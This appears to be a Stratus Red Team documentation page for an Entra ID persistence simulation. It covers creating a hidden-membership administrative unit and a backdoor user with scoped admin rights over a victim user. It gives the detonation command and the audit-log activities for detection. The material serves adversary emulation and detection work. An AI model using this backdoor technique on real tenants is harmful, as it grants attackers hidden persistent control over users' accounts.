Create Hidden Scoped Role Assignment Through HiddenMembership AU

Platform: Entra ID

MITRE ATT&CK Tactics

• Persistence

Description

Creates an Administrative Unit (AU) with hidden membership, and a scoped role assignment over this AU. This simulates an attacker that TODO.

Warm-up:

• Create the target (victim) Entra ID user

Detonation:

• Create an administrative unit with hidden membership
• Create a backdoor Entra ID user
• Add the target (victim) user to the administrative unit
• Assign the backdoor user with Privileged Administration Administrator rights over the administrative unit

This simulates an attacker that indirectly persists their access. The backdoor user can now perform privileged operations over any user in the administrative unit, which can be used to escalate privileges or maintain access, for instance by resetting the target user's password.

References:

• https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/administrative-units

Instructions

Detonate with Stratus Red Team

stratus detonate entra-id.persistence.hidden-au

Detection

Using Entra ID audit logs with the specific activity types:

For Service: Core Directory and Category: AdministrativeUnit:

• Add administrative unit
• Add member to administrative unit

For Service: Core Directory and Category: RoleManagement:

• Add scoped member to role